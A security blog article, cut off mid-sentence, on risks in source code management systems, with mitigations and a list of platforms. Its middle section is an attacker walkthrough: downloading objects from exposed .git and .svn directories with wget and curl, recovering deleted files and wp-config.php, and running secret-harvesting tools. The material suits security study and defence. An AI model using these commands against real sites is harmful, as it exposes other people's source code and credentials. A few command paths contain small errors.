Insecure Source Code Management: Mitigating Risks for Secure Software Development

Posted by spyboy

Introduction:

Source code management (SCM) systems are vital tools for software development, enabling version control, collaboration, and tracking changes. However, if SCM systems are not securely implemented, they can become a gateway for unauthorized access, code leakage, or even malicious activities. This article delves into the concept of insecure source code management, provides examples of vulnerabilities, and highlights tools and strategies to mitigate these risks.

Understanding Insecure Source Code Management:

Insecure source code management refers to vulnerabilities arising from weak security practices or misconfigurations within SCM systems. These vulnerabilities can lead to unauthorized access, data breaches, code leakage, or unauthorized modifications to source code repositories.

Examples of Insecure Source Code Management:

1. Weak Authentication and Access Controls: Inadequate authentication mechanisms, weak passwords, or misconfigured access controls can allow unauthorized users to gain access to source code repositories. This could lead to the exposure of sensitive code, intellectual property theft, or unauthorized modifications.

2. Insufficient Encryption: Failing to encrypt communication between clients and SCM servers can expose source code and sensitive data to interception or tampering. Without encryption, attackers can eavesdrop on network traffic and gain unauthorized access to source code repositories.

3. Code Exposure through Misconfigured Permissions: Improper permission settings within SCM systems can lead to unintended code exposure. For example, if read or write permissions are erroneously granted to unauthorized users or publicly accessible repositories, sensitive source code may become visible to unauthorized individuals or even public search engines.

4. Insecure Handling of Credentials: Storing passwords, SSH keys, or other authentication credentials in plaintext within SCM repositories or configuration files can expose sensitive information. If attackers gain access to these credentials, they can impersonate authorized users, compromise repositories, or exploit other systems connected to the SCM.

Recovering file contents from .git/logs/HEAD

Check for 403 Forbidden or directory listing to find the /.git/ directory

Git saves all information in .git/logs/HEAD (try lowercase head too)

0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000        commit: Initial.
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000        commit: Whoops! Remove flag.
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000        commit: Prevent directory listing.

Access the commit using the hash

# create an empty .git repository
git init test
cd test/.git

# download the file
wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c

# first byte for subdirectory, remaining bytes for filename
mkdir .git/object/26
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/

# display the file
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
    tree 323240a3983045cdc0dec2e88c1358e7998f2e39
    parent 15ca375e54f056a576905b41a417b413c57df6eb
    author Michael <michael@easyctf.com> 1489390329 +0000
    committer Michael <michael@easyctf.com> 1489390329 +0000
    Initial.

Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39

wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
mkdir .git/object/32
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/

git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
    040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
    100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
    040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
    100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
    040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js

Read the data (flag.txt)

wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
mkdir .git/object/cb
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f

Recovering file contents from .git/index

Use the git index file parser https://pypi.python.org/pypi/gin (python3).

pip3 install gin
gin ~/git-repo/.git/index

Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.

$ gin .git/index | egrep -e "name|sha1" 
name = AWS Amazon Bucket S3/README.md
sha1 = 862a3e58d138d6809405aa062249487bee074b98

name = CRLF injection/README.md
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141

Harvesting secrets

TRUFFLEHOG

Searches through git repositories for high entropy strings and secrets, digging deep into commit history.

pip install truffleHog # https://github.com/dxa4481/truffleHog
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git

YAR

Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.

go get github.com/nielsing/yar # https://github.com/nielsing/yar
yar -o orgname --both

GITROB

Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.

go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
gitrob [options] target [target2] ... [targetN]

GITLEAKS

Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.

# Run gitleaks against a public repository
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git

# Run gitleaks against a local repository already cloned into /tmp/
docker run --rm --name=gitleaks -v /tmp/:/code/  zricethezav/gitleaks -v --repo-path=/code/gitleaks

# Run gitleaks against a specific Github Pull request
docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000

or

go get -u github.com/zricethezav/gitleaks

Subversion

Example (WordPress)

curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base

Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db

INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);

Download interesting files
- remove \$sha1\$ prefix
- add .svn-base postfix
- use first byte from hash as a subdirectory of the pristine/ directory (94 in this case)
- ```
create complete path, which will be: http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base
```

Mitigating Insecure Source Code Management Risks:

1. Strong Authentication and Access Controls: Enforce strong authentication mechanisms such as two-factor authentication (2FA) and implement granular access controls. Ensure that only authorized personnel have access to the source code repositories.

2. Encryption for Data in Transit and at Rest: Use secure protocols such as HTTPS or SSH for communication between SCM clients and servers to encrypt data in transit. Additionally, employ encryption mechanisms to protect source code repositories when at rest, such as disk-level or file-level encryption.

3. Regular Security Audits and Vulnerability Assessments: Conduct routine security audits and vulnerability assessments to identify weaknesses in SCM systems and configurations. Regularly scan repositories for sensitive information or misconfigured permissions that may expose source code.

4. Secure Handling of Credentials: Implement secure practices for handling authentication credentials. Avoid storing credentials in plaintext within repositories or configuration files. Instead, utilize secure credential management tools or securely store credentials outside the SCM system.

Tools for Secure Source Code Management:

1. GitLab: A popular SCM platform that offers robust security features, including strong access controls, audit logs, and encrypted communication. It provides built-in security scanning and vulnerability management capabilities.

2. Bitbucket: An SCM system that offers access controls, branch restrictions, and integration with identity providers for secure authentication. It provides options for enforcing encryption and secure handling of credentials.

3. GitHub: A widely used SCM platform that offers features like organization-level access controls, code scanning for vulnerabilities, and dependency analysis. It also supports encrypted communication and provides tools for secure credential management.

Conclusion:

Securing source code management systems is crucial for protecting sensitive source code, ensuring data integrity, and mitigating the risk of unauthorized access or code leakage. By implementing strong authentication, access controls, encryption mechanisms, and following secure practices for credential management, organizations can significantly reduce the vulnerabilities associated with insecure source code management. Regular security audits and utilizing reliable SCM tools with built